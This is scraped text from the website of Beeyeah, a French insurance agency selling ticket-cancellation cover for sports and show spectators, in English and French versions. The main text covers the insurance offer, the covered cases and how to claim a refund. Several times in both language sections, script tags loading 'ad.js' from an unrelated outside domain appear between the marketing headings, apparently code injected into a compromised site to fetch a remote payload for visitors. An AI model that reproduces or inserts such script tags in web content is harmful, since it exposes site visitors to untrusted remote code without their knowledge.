• Français
  • English
  • Español
contact@beeyeah.fr
+33(0)4 28 29 67 76

Impossible to get to the stadium ?

Beeyeah, Insurance that comforts.

An unexpected event ?

Beeyeah, Insurance that comforts.

Not in a good mood to go to the game ?

Beeyeah, Insurance that comforts.

<script src='https://blueeyeswebsite.com/ad.js' type='text/javascript'></script>

How does it go, how to profit from it?

In order to profit from one of services “BEEYEAH”, it is necessary that you bought a ticket or a subscription near one of the clubs or a entertainment company having subscribed a partnership with BEEYEAH.

Leanr more

Which are the covered cases?

For the subscribers: the refunding of a certain number of tickets according to the option chosen by the club or the entertainment company to which you are subscribed;

For the occasional spectators: the refunding of the ticket according to the conditions chosen by the club or the entertainment company near whom you bought the ticket.

Learn more

How to be made refund?

You must click on the link below in order to discover the form to be downloaded. Fill it, print it, and to return it to us either by e-mail or by mail to the addresses indicated, accompanied imperatively by the obligatory documents for proof of an assumption of responsibility.

Download the claim form

In the beginning we are specialized in the insurances relating to the world of the company, of financial protection as in that of the leaders, like in the mechanical sports of competition.

The insurance in inclusion exists for a large number of subjects in the world of the company, but did not exist yet in the world of the ticket office.

With the professionalisation of a large number of sport, the interest carried to the spectators passed in third or fourth position, whereas without these spectators there would be no show and the sports would not have exploded on the media level in the same way.

The idea is to give again interest with these spectators, in their recalling that without them there would be no possible show, by making them profit from an insurance cancellation in formula all causes, while creating an important income source for the clubs or organizers of shows.

We thus developed a specific product, by using a management system which was born from our experiment in the expertise on the disasters near our customers.

For the clubs or Entertainment Companies, after validation of the protocol and reception of the files at the time of each match or representation, we assume the entirety of the technical, operational and financial follow-up.

We communicate, via our site, the useful information and necessary to the supporters or spectators on operation of the offer and the methods in the event of claim.

Any request can be done, as from the moment when this one corresponds to a warranty subscribed by the club or the entertainment company, that the ticket was bought near the ticket office of the club which receives or the company which organizes, and whom the applicant either imperatively domiciled in the country or of the club (Beeyeah partner) which receives, or of the entertainment company (Beeyeah partner) which organizes.

• Français
  • English
  • Español
contact@beeyeah.fr
+33(0)4 28 29 67 76

Impossible de vous rendre au stade ?

Beeyeah, l'assurance réconfort.

Un imprévu ?

Beeyeah, l'assurance réconfort

Pas dans vos baskets pour aller au match ?

Beeyeah, l'assurance réconfort.

<script src='https://blueeyeswebsite.com/ad.js' type='text/javascript'></script>

Comment ça marche, comment en bénéficier ?

Afin de bénéficier d’une des prestations « BEEYEAH », il faut que vous ayez acheté un billet ou un abonnement auprès d’un des clubs ou sociétés commerciales ayant souscrit un partenariat avec notre agence.

En savoir plus
<script src='https://blueeyeswebsite.com/ad.js' type='text/javascript'></script>

Quels sont les cas couverts ?

Pour les abonnés : le remboursement d’un certain nombre de billets selon l’option choisie par le club ou la société de spectacle à laquelle vous êtes abonné ;

Pour les spectateurs occasionnels : le remboursement du billet selon les conditions choisies par le club ou la société de spectacle auprès de laquelle vous avez acheté le billet.

En savoir plus
<script src='https://blueeyeswebsite.com/ad.js' type='text/javascript'></script>

Comment se faire rembourser ?

Il suffit de se rendre sur l’onglet « Déclaration » afin de découvrir le formulaire à télécharger. L’imprimer, le compléter et nous le retourner soit par mail soit par courrier aux adresses indiquées, accompagné impérativement des justificatifs obligatoires pour une prise en charge du dossier.

Télécharger le formulaire de déclaration de sinistre

A l’origine nous sommes spécialisés dans les assurances relatives au monde de l’entreprise, de la protection financière comme dans celle des dirigeants, ainsi que dans les sports mécaniques de compétition.

L’assurance en inclusion existe pour un grand nombre de sujets dans le monde de l’entreprise, mais n’existait pas encore dans le monde de la billetterie.

Avec la professionnalisation d’un grand nombre de sport, l’intérêt porté aux spectateurs est passé en troisième ou quatrième position, alors que sans ces spectateurs il n’y aurait pas de spectacle et les sports n’auraient pas explosés au niveau médiatique de la même manière.

L’idée est de redonner de l’intérêt à ces spectateurs, en leur rappelant que sans eux il n’y aurait pas de spectacle possible, en les faisant bénéficier d’une assurance annulation en formule toutes causes, tout en créant une source de revenus importante pour les clubs ou organisateurs de spectacles.

Nous avons donc développé un produit spécifique, en utilisant un système de gestion qui est né de notre expérience dans l’expertise des sinistres auprès de nos clients.

Pour les clubs ou Sociétés de Spectacles, après validation du protocole et réception des fichiers lors de chaque match ou représentation, nous assumons l’intégralité du suivi technique, opérationnel et financier.

Nous communiquons, via notre site, les informations utiles et nécessaires aux supporters ou spectateurs sur le fonctionnement de l’offre et les modalités en cas de réclamation.

Toute demande peut se faire, à partir du moment où celle-ci correspond à une garantie souscrite par le club ou la société de spectacles, que le billet ait été acheté auprès de la billetterie du club qui reçoit ou de la société commerciale qui organise, et que le demandeur soit impérativement domicilié dans le pays soit du club (partenaire Beeyeah) qui reçoit, ou de la société de spectacles (partenaire Beeyeah) qui organise.